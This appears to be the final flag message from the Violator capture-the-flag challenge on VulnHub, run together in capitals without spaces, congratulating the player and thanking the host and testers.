ONEFINALCHALLENGEFORYOUBGHXCONGRATULATIONSFORTHEFOURTHTIMEONSNARFINGTHEFLAGONVIOLATORILLPRESUMEBYNOWYOULLKNOWWHATIWASLISTENINGTOWHENCREATINGTHISCTFIHAVEINCLUDEDTHINGSWHICHWEREDELIBERATLYAVOIDINGTHEOBVIOUSROUTEINTOKEEPYOUONYOURTOESANOTHERTHOUGHTTOPONDERISTHATBYABUSINGPERMISSIONSYOUAREALSOBYDEFINITIONAVIOLATORSHOUTOUTSAGAINTOVULNHUBFORHOSTINGAGREATLEARNINGTOOLASPECIALTHANKSGOESTOBENRANDGKNSBFORTESTINGANDTOGTMLKFORTHEOFFERTOHOSTTHECTFAGAINKNIGHTMARE